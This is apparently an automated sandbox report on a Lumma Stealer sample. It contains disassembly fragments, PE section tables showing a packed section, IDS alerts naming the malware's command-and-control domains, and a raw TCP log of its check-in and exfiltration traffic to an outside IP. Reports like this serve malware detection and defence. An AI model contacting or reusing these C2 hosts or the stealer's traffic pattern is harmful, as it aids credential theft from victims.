                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], dh
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                adc byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                or ecx, dword ptr [edx]
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                inc eax
                                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [esi], al
                                                                                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                adc byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                push es
                                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], dl
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [ebx], al
                                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [esi], al
                                                                                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                adc byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                push es
                                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], dl
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [ebx], cl
                                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [esi], al
                                                                                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                                Data Directories

                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                Sections

                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                0x10000x5d0000x25e00db21758e7064a7e029673a1972d9454aFalse0.9995487830033003data7.982552792221966IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                teechqve0x600000x2c20000x2c160056d248749240a16ac085933783549cecunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                nqocidhr0x3220000x10000x4003fabf83997a90627a203ee99096ffc96False0.794921875data6.215472207497749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                .taggant0x3230000x30000x220026b9ba7e2434d588d5dab1729efc2c2aFalse0.06376378676470588DOS executable (COM)0.7991853633956142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                Imports

                                                                                                                                                                                DLLImport
                                                                                                                                                                                kernel32.dlllstrcpy

                                                                                                                                                                                Network Behavior

                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                2024-10-20T08:38:59.571722+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.4599151.1.1.153UDP
                                                                                                                                                                                2024-10-20T08:38:59.584613+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.4636701.1.1.153UDP
                                                                                                                                                                                2024-10-20T08:38:59.602547+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.4550491.1.1.153UDP
                                                                                                                                                                                2024-10-20T08:38:59.614174+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.4597021.1.1.153UDP
                                                                                                                                                                                2024-10-20T08:38:59.626740+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.4513551.1.1.153UDP
                                                                                                                                                                                2024-10-20T08:38:59.636719+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.4492411.1.1.153UDP
                                                                                                                                                                                2024-10-20T08:38:59.648118+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.4641201.1.1.153UDP
                                                                                                                                                                                2024-10-20T08:38:59.660237+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.4625431.1.1.153UDP
                                                                                                                                                                                2024-10-20T08:39:01.696060+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449730104.102.49.254443TCP
                                                                                                                                                                                2024-10-20T08:39:02.704882+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731104.21.53.8443TCP
                                                                                                                                                                                2024-10-20T08:39:02.704882+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.53.8443TCP
                                                                                                                                                                                2024-10-20T08:39:04.345979+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732104.21.53.8443TCP
                                                                                                                                                                                2024-10-20T08:39:04.345979+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.53.8443TCP
                                                                                                                                                                                2024-10-20T08:39:07.882161+02002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449734104.21.53.8443TCP
                                                                                                                                                                                2024-10-20T08:39:17.692929+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449739104.21.53.8443TCP

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Oct 20, 2024 08:38:59.691245079 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:38:59.691354036 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:38:59.691447020 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:38:59.715997934 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:38:59.716048956 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:00.798187971 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:00.798295021 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:00.807801008 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:00.807828903 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:00.808248997 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:00.850914955 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:00.855911970 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:00.903398037 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696165085 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696191072 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696238995 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696253061 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696275949 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696357012 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:01.696357965 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:01.696357965 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:01.696393013 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696420908 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696434975 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696595907 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:01.696595907 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:01.698622942 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:01.698688030 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.752804041 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:01.752890110 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.752993107 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:01.753384113 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:01.753437042 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.528721094 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.528816938 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.531512976 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.531539917 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.531893015 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.533134937 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.533171892 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.533247948 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.704909086 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.704969883 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.705032110 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.705046892 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.705075026 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.705136061 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.705152035 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.705178976 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.705248117 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.706109047 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.706139088 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.706170082 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.706185102 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.775787115 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.775820017 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.775899887 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.776146889 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.776164055 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:03.546849012 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:03.546914101 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:03.551188946 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:03.551202059 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:03.551415920 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:03.558259964 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:03.558295965 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:03.558321953 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.345999956 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346034050 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346052885 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346071959 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.346084118 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346126080 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.346131086 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346163034 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346190929 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346201897 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.346206903 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346244097 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.346246958 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346277952 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346314907 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.346318960 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.397763968 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.493994951 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.494046926 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.494066000 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.494091988 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.494098902 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.494136095 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.494139910 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.494240999 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.494246006 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.494256973 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.618071079 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.618122101 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.618201017 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.618480921 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.618495941 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:05.386384964 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:05.386449099 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:05.387806892 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:05.387814999 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:05.388052940 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:05.389374971 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:05.389523983 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:05.389554024 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:05.389611959 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:05.389621019 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:06.400767088 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:06.400830984 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:06.400892019 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:06.400966883 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:06.400984049 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:06.493166924 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:06.493191957 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:06.493309021 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:06.493689060 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:06.493700027 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.262691021 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.262830019 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:07.264739990 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:07.264750957 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.265039921 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.266602993 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:07.266732931 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:07.266760111 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.881908894 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.882008076 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:07.882074118 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:07.882416010 CEST49734443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:07.882433891 CEST44349734104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:08.086041927 CEST49735443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:08.086074114 CEST44349735104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:08.086157084 CEST49735443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:08.086477995 CEST49735443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:08.086489916 CEST44349735104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:08.953206062 CEST44349735104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:08.953301907 CEST49735443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:08.954662085 CEST49735443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:08.954669952 CEST44349735104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:08.954943895 CEST44349735104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:08.956228971 CEST49735443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:08.956382036 CEST49735443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:08.956415892 CEST44349735104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:08.956481934 CEST49735443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:08.956486940 CEST44349735104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:09.769901037 CEST44349735104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:09.770025015 CEST44349735104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:09.770097017 CEST49735443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:09.770112038 CEST44349735104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:10.096518040 CEST49736443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:10.096616983 CEST44349736104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:10.096702099 CEST49736443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:10.097058058 CEST49736443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:10.097091913 CEST44349736104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:10.860639095 CEST44349736104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:10.860924006 CEST49736443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:10.862164974 CEST49736443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:10.862204075 CEST44349736104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:10.863068104 CEST44349736104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:10.864463091 CEST49736443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:10.864567995 CEST49736443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:10.864582062 CEST44349736104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:11.451075077 CEST44349736104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:11.451145887 CEST44349736104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:11.451201916 CEST49736443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:11.451244116 CEST49736443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:11.451267958 CEST44349736104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.038868904 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.038979053 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.039077044 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.039447069 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.039479017 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.802630901 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.802737951 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.804218054 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.804254055 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.804594994 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.806251049 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.806988001 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.807039976 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.807214975 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.807259083 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.807420015 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.807466030 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.807642937 CEST49737443192.168.2.4104.21.53.8
